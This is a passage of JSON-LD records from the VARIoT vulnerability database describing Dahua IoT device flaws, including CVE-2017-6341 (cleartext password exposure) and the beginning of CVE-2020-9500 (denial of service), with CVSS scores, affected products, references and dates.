        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Dahua Classic buffer overflow vulnerability in the product",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003798"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202004-553"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201702-1055

    Vulnerability from variot - Updated: 2023-12-18 13:34

    Dahua DHI-HCVR7216A-S3 devices with NVR Firmware 3.210.0001.10 2016-06-06, Camera Firmware 2.400.0000.28.R 2016-03-29, and SmartPSS Software 1.16.1 2017-01-19 send cleartext passwords in response to requests from the Web Page, Mobile Application, and Desktop Application interfaces, which allows remote attackers to obtain sensitive information by sniffing the network, a different vulnerability than CVE-2013-6117. This vulnerability CVE-2013-6117 Is a different vulnerability.A remote attacker could intercept your network and gain valuable information. Dahua DHI-HCVR7216A-S3 is a network hard disk recorder product of Dahua Company of China. Dahua Security Multiple Products are prone to an information-disclosure vulnerability

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201702-1055",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "smartpss",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": "1.16.1"
          },
          {
            "model": "camera",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": "2.400.0000.28.r"
          },
          {
            "model": "nvr",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": "3.210.0001.10"
          },
          {
            "model": "camera",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "dahua",
            "version": "2.400.0000.28.r 2016-03-29"
          },
          {
            "model": "nvr",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "dahua",
            "version": "3.210.0001.10 2016-06-06"
          },
          {
            "model": "smart pss",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "dahua",
            "version": "1.16.1 2017-01-19"
          },
          {
            "model": "security dhi-hcvr7216a-s3",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "3.210.0001.102016-06-06"
          },
          {
            "model": "security camera 2.400.0000.28.r",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2016-03-29"
          },
          {
            "model": "security smartpss software",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "1.16.12017-01-19"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02589"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002228"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6341"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-920"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:smartpss_firmware:1.16.1:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:camera_firmware:2.400.0000.28.r:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr_firmware:3.210.0001.10:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dhi-hcvr7216a-s3:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-6341"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Andrew Frahn.",
        "sources": [
          {
            "db": "BID",
            "id": "96456"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2017-6341",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "MEDIUM",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Medium",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 4.3,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "CVE-2017-6341",
                "impactScore": null,
                "integrityImpact": "None",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.9,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 7.8,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2017-02589",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "VHN-114544",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.9,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.2,
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              },
              {
                "attackComplexity": "High",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 5.9,
                "baseSeverity": "Medium",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2017-6341",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2017-6341",
                "trust": 1.8,
                "value": "MEDIUM"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2017-02589",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201702-920",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-114544",
                "trust": 0.1,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2017-6341",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02589"
          },
          {
            "db": "VULHUB",
            "id": "VHN-114544"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-6341"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002228"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6341"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-920"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Dahua DHI-HCVR7216A-S3 devices with NVR Firmware 3.210.0001.10 2016-06-06, Camera Firmware 2.400.0000.28.R 2016-03-29, and SmartPSS Software 1.16.1 2017-01-19 send cleartext passwords in response to requests from the Web Page, Mobile Application, and Desktop Application interfaces, which allows remote attackers to obtain sensitive information by sniffing the network, a different vulnerability than CVE-2013-6117. This vulnerability CVE-2013-6117 Is a different vulnerability.A remote attacker could intercept your network and gain valuable information. Dahua DHI-HCVR7216A-S3 is a network hard disk recorder product of Dahua Company of China. Dahua Security Multiple Products are prone to an information-disclosure vulnerability",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-6341"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002228"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-02589"
          },
          {
            "db": "BID",
            "id": "96456"
          },
          {
            "db": "VULHUB",
            "id": "VHN-114544"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-6341"
          }
        ],
        "trust": 2.61
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2017-6341",
            "trust": 3.5
          },
          {
            "db": "BID",
            "id": "96456",
            "trust": 2.7
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002228",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-920",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-02589",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-114544",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-6341",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02589"
          },
          {
            "db": "VULHUB",
            "id": "VHN-114544"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-6341"
          },
          {
            "db": "BID",
            "id": "96456"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002228"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6341"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-920"
          }
        ]
      },
      "id": "VAR-201702-1055",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02589"
          },
          {
            "db": "VULHUB",
            "id": "VHN-114544"
          }
        ],
        "trust": 1.60625
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT",
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02589"
          }
        ]
      },
      "last_update_date": "2023-12-18T13:34:19.223000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "HCVR7204/7208/7216A-S3",
            "trust": 0.8,
            "url": "http://www1.dahuasecurity.com/th/products/hcvr720472087216a-s3-1434.html"
          },
          {
            "title": "Dahua DHI-HCVR7216A-S3 Security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=99659"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002228"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-920"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-319",
            "trust": 1.1
          },
          {
            "problemtype": "CWE-200",
            "trust": 0.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-114544"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002228"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6341"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.2,
            "url": "https://nullku7.github.io/stuff/exposure/dahua/2017/02/24/dahua-nvr.html"
          },
          {
            "trust": 2.5,
            "url": "http://www.securityfocus.com/bid/96456"
          },
          {
            "trust": 1.8,
            "url": "https://twitter.com/null_ku7/status/835649185168838657"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-6341"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2017-6341"
          },
          {
            "trust": 0.3,
            "url": "http://www.dahuasecurity.com/products_category/dvr-2.html"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/319.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02589"
          },
          {
            "db": "VULHUB",
            "id": "VHN-114544"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-6341"
          },
          {
            "db": "BID",
            "id": "96456"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002228"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6341"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-920"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02589"
          },
          {
            "db": "VULHUB",
            "id": "VHN-114544"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-6341"
          },
          {
            "db": "BID",
            "id": "96456"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002228"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6341"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-920"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-03-10T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-02589"
          },
          {
            "date": "2017-02-27T00:00:00",
            "db": "VULHUB",
            "id": "VHN-114544"
          },
          {
            "date": "2017-02-27T00:00:00",
            "db": "VULMON",
            "id": "CVE-2017-6341"
          },
          {
            "date": "2017-02-27T00:00:00",
            "db": "BID",
            "id": "96456"
          },
          {
            "date": "2017-04-05T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-002228"
          },
          {
            "date": "2017-02-27T07:59:00.380000",
            "db": "NVD",
            "id": "CVE-2017-6341"
          },
          {
            "date": "2017-02-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201702-920"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-03-10T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-02589"
          },
          {
            "date": "2019-10-03T00:00:00",
            "db": "VULHUB",
            "id": "VHN-114544"
          },
          {
            "date": "2019-10-03T00:00:00",
            "db": "VULMON",
            "id": "CVE-2017-6341"
          },
          {
            "date": "2017-03-07T01:08:00",
            "db": "BID",
            "id": "96456"
          },
          {
            "date": "2017-04-05T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-002228"
          },
          {
            "date": "2019-10-03T00:03:26.223000",
            "db": "NVD",
            "id": "CVE-2017-6341"
          },
          {
            "date": "2019-10-23T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201702-920"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-920"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Dahua DHI-HCVR7216A-S3 Vulnerabilities that capture important information on devices",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002228"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "information disclosure",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-920"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202004-1824

    Vulnerability from variot - Updated: 2023-12-18 13:28

    Some products of Dahua have Denial of Service vulnerabilities. After the successful login of the legal account, the attacker sends a specific log query command, which may cause the device to go down. Dahua There is an input verification vulnerability in.Service operation interruption (DoS) It may be put into a state. Dahua SD6AL Series and others are products of China Dahua Company. SD6AL Series is a SD6AL series network camera. NVR 5x Series is a 5x series network video recorder. IPC-HX2XXX Series is an IPC-HX2XXX series network camera.

    There are security holes in many Dahua products

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202004-1824",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ipc-hx7842h",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "n42b3p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "sd1a",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "n42b2p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "n52b3p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "n52b2p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "n52a4p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "sd50",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "n52b5p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "ipc-hx5842h",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "n42b1p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "sd5a",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "sd6al",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "n54a4p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "ipc-hxxx5x4x",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "ptz1a",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "sd52c",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "n54b2p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "ipc-hx2xxx",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "ipc-hx2xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hx5842h",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hx7842h",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hxxx5x4x",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ptz1a",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "sd1a",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "sd50",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "sd52c",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "sd5a",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "sd6al",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "sd 6al series",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "sd 5a series",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "sd 1a series",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "sd 50/52c series",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr n5x series",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr n4x series",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc n4 series",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22980"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003799"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9500"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:sd6al_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:sd6al:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
